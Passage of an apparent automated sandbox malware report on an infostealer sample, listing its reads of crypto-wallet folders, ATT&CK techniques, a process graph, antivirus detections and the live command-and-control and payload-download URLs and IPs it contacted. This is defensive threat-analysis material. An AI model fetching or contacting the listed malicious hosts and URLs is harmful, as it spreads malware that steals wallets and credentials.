                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPS
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                          Source: Yara matchFile source: 0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.3245722384.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3197230933.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3190538036.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3131338677.00000000012CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.3365772900.00000000005E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3190424295.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3164980897.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.3271234904.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.3271575220.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3164239132.00000000012C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3190825384.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000F.00000003.3365494500.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3137799586.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000003.3106209007.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: d0d9725343.exe PID: 5564, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 176986cc9c.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 176986cc9c.exe PID: 3504, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 3981530833.exe PID: 1776, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: 176986cc9c.exe PID: 5440, type: MEMORYSTR
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 0000000E.00000002.3180012118.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000003.3122477181.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000003.3258280474.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3351423687.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001E.00000002.3354435913.0000000000A81000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: f570600774.exe PID: 5936, type: MEMORYSTR
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFEC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00BFEC48
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFDF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00BFDF51
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          DLL Side-Loading
                          311
                          Disable or Modify Tools
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts11
                          Native API
                          1
                          Scheduled Task/Job
                          2
                          Bypass User Account Control
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory12
                          File and Directory Discovery
                          Remote Desktop Protocol41
                          Data from Local System
                          21
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts3
                          Command and Scripting Interpreter
                          11
                          Registry Run Keys / Startup Folder
                          1
                          Extra Window Memory Injection
                          5
                          Obfuscated Files or Information
                          Security Account Manager246
                          System Information Discovery
                          SMB/Windows Admin Shares1
                          Screen Capture
                          3
                          Non-Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          Login Hook212
                          Process Injection
                          12
                          Software Packing
                          NTDS891
                          Security Software Discovery
                          Distributed Component Object Model2
                          Clipboard Data
                          114
                          Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          DLL Side-Loading
                          LSA Secrets361
                          Virtualization/Sandbox Evasion
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Account Control
                          Cached Domain Credentials3
                          Process Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Extra Window Memory Injection
                          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Masquerading
                          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt361
                          Virtualization/Sandbox Evasion
                          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                          Process Injection
                          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571920 Sample: file.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 74 drive-connect.cyou 2->74 76 youtube.com 2->76 78 20 other IPs or domains 2->78 100 Suricata IDS alerts for network traffic 2->100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 17 other signatures 2->106 9 skotes.exe 4 33 2->9         started        14 file.exe 5 2->14         started        16 176986cc9c.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 92 185.215.113.43, 49848, 49854, 49868 WHOLESALECONNECTIONSNL Portugal 9->92 94 185.215.113.16, 49898, 49923, 49945 WHOLESALECONNECTIONSNL Portugal 9->94 96 31.41.244.11, 49859, 49874, 80 AEROEXPRESS-ASRU Russian Federation 9->96 62 C:\Users\user\AppData\...\536e42fc8b.exe, PE32 9->62 dropped 64 C:\Users\user\AppData\...\3981530833.exe, PE32 9->64 dropped 66 C:\Users\user\AppData\...\f570600774.exe, PE32 9->66 dropped 72 9 other malicious files 9->72 dropped 134 Creates multiple autostart registry keys 9->134 136 Hides threads from debuggers 9->136 138 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->138 20 176986cc9c.exe 9->20         started        24 536e42fc8b.exe 9->24         started        26 f30149f036.exe 21 9->26         started        34 3 other processes 9->34 68 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->68 dropped 70 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->70 dropped 140 Detected unpacking (changes PE section rights) 14->140 142 Tries to evade debugger and weak emulator (self modifying code) 14->142 144 Tries to detect virtualization through RDTSC time measurements 14->144 28 skotes.exe 14->28         started        146 Found many strings related to Crypto-Wallets (likely being stolen) 16->146 148 Tries to harvest and steal ftp login credentials 16->148 150 Tries to harvest and steal browser information (history, passwords, etc) 16->150 152 Tries to steal Crypto Currency Wallets 16->152 154 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->154 30 firefox.exe 18->30         started        32 taskkill.exe 18->32         started        file6 signatures7 process8 dnsIp9 80 atten-supporse.biz 104.21.48.1, 443, 49921, 49930 CLOUDFLARENETUS United States 20->80 108 Query firmware table information (likely to detect VMs) 20->108 110 Machine Learning detection for dropped file 20->110 112 Found many strings related to Crypto-Wallets (likely being stolen) 20->112 114 Tries to steal Crypto Currency Wallets 20->114 116 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->116 126 4 other signatures 24->126 82 80.82.65.70, 49957, 80 INT-NETWORKSC Netherlands 26->82 128 3 other signatures 26->128 118 Antivirus detection for dropped file 28->118 120 Multi AV Scanner detection for dropped file 28->120 122 Detected unpacking (changes PE section rights) 28->122 130 2 other signatures 28->130 84 youtube.com 142.250.181.78, 443, 50002, 50006 GOOGLEUS United States 30->84 86 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 50003, 50016, 80 GOOGLEUS United States 30->86 90 5 other IPs or domains 30->90 36 firefox.exe 30->36         started        38 firefox.exe 30->38         started        40 conhost.exe 32->40         started        88 185.215.113.206, 49944, 50004, 80 WHOLESALECONNECTIONSNL Portugal 34->88 124 Binary is likely a compiled AutoIt script file 34->124 132 2 other signatures 34->132 42 d0d9725343.exe 34->42         started        46 taskkill.exe 34->46         started        48 taskkill.exe 34->48         started        50 6 other processes 34->50 signatures10 process11 dnsIp12 98 drive-connect.cyou 172.67.139.78, 443, 49867, 49873 CLOUDFLARENETUS United States 42->98 156 Query firmware table information (likely to detect VMs) 42->156 158 Found many strings related to Crypto-Wallets (likely being stolen) 42->158 160 Tries to steal Crypto Currency Wallets 42->160 52 conhost.exe 46->52         started        54 conhost.exe 48->54         started        56 conhost.exe 50->56         started        58 conhost.exe 50->58         started        60 conhost.exe 50->60         started        signatures13 process14

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe55%ReversingLabsWin32.Infostealer.Tinba
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe100%AviraTR/ATRAPS.Gen
                          C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe100%AviraHEUR/AGEN.1320706
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraHEUR/AGEN.1320706
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe32%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe54%ReversingLabsWin32.Ransomware.Generic
                          C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe32%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe54%ReversingLabsWin32.Ransomware.Generic
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe55%ReversingLabsWin32.Infostealer.Tinba
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          https://atten-supporse.biz/6)100%Avira URL Cloudmalware
                          http://185.215.113.16/well/random.exe_Q100%Avira URL Cloudmalware
                          http://185.215.113.43/Zu7JuNko/index.phpncodedM=100%Avira URL Cloudmalware
                          http://185.215.113.16/steam/random.exeZP100%Avira URL Cloudmalware
                          http://80.82.65.70/files/download0/files/download0%Avira URL Cloudsafe
                          https://atten-supporse.biz/apiU.100%Avira URL Cloudmalware
                          http://www.inbox.lv/rfc2368/?value=%shandlerSvc0%Avira URL Cloudsafe
                          http://185.215.113.206/c4becf79229cb002.phpgRL100%Avira URL Cloudmalware
                          https://accounts.go0%Avira URL Cloudsafe
                          https://addons.mozilla.orgADD_EXTENSION_BUTTON_STAFF_3defaults_and_os_integration0%Avira URL Cloudsafe
                          https://login.microsoftonline.comresource://normandy/lib/PrefUtils.sys.mjsresource://normandy/lib/Te0%Avira URL Cloudsafe
                          http://185.215.113.206/c4becf79229cb002.phpph100%Avira URL Cloudmalware
                          http://185.215.113.16/luma/random.exe;P100%Avira URL Cloudmalware
                          http://185.215.113.16/luma/random.exe-P100%Avira URL Cloudmalware
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          example.org
                          93.184.215.14
                          truefalse
                            high
                            prod.classify-client.prod.webservices.mozgcp.net
                            35.190.72.216
                            truefalse
                              high
                              prod.balrog.prod.cloudops.mozgcp.net
                              35.244.181.201
                              truefalse
                                high
                                prod.detectportal.prod.cloudops.mozgcp.net
                                34.107.221.82
                                truefalse
                                  high
                                  s-part-0035.t-0009.t-msedge.net
                                  13.107.246.63
                                  truefalse
                                    high
                                    contile.services.mozilla.com
                                    34.117.188.166
                                    truefalse
                                      high
                                      youtube.com
                                      142.250.181.78
                                      truefalse
                                        high
                                        prod.content-signature-chains.prod.webservices.mozgcp.net
                                        34.160.144.191
                                        truefalse
                                          high
                                          atten-supporse.biz
                                          104.21.48.1
                                          truefalse
                                            high
                                            ipv4only.arpa
                                            192.0.0.170
                                            truefalse
                                              high
                                              prod.ads.prod.webservices.mozgcp.net
                                              34.117.188.166
                                              truefalse
                                                high
                                                www.google.com
                                                172.217.21.36
                                                truefalse
                                                  high
                                                  drive-connect.cyou
                                                  172.67.139.78
                                                  truetrue
                                                    unknown
                                                    js.monitor.azure.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      spocs.getpocket.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        detectportal.firefox.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          content-signature-2.cdn.mozilla.net
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://185.215.113.206/false
                                                              high
                                                              formy-spill.bizfalse
                                                                high
                                                                https://atten-supporse.biz/apifalse
                                                                  high
                                                                  dwell-exclaim.bizfalse
                                                                    high
                                                                    http://80.82.65.70/dll/downloadfalse
                                                                      high
                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://basket.mozilla.org/news/subscribe_sms/firefox.exe, 0000001D.00000002.3389826733.00000214A7C00000.00000002.00000001.00040000.0000001B.sdmpfalse
                                                                        high
                                                                        https://atten-supporse.biz/6)176986cc9c.exe, 0000000F.00000003.3365494500.00000000005E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsfirefox.exe, 0000001D.00000002.3385444273.00000214A7BE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://merino.services.mozilla.com/api/v1/suggestfirefox.exe, 0000001D.00000002.3385444273.00000214A7B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3377707348.000002149B5DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://json-schema.org/draft/2019-09/schema.firefox.exe, 0000001D.00000002.3414473910.00000214AC854000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://spocs.getpocket.com/spocsfirefox.exe, 0000001D.00000002.3433552608.00000214AF32D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozillfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://screenshots.firefox.comfirefox.exe, 0000001D.00000002.3391313912.00000214A7E00000.00000002.00000001.00040000.0000001C.sdmp, firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ads.stickyadstv.com/firefox-etpfirefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://addons.mozilla.org/en-US/firefox/collections/4757633/25c2b44583534b3fa8fea977c419cd/?page=1&firefox.exe, 0000001D.00000002.3408991340.00000214ABF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 0000001D.00000002.3442726709.00000214B3C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.amazon.com/exec/obidos/external-search/firefox.exe, 0000001D.00000002.3385444273.00000214A7B03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
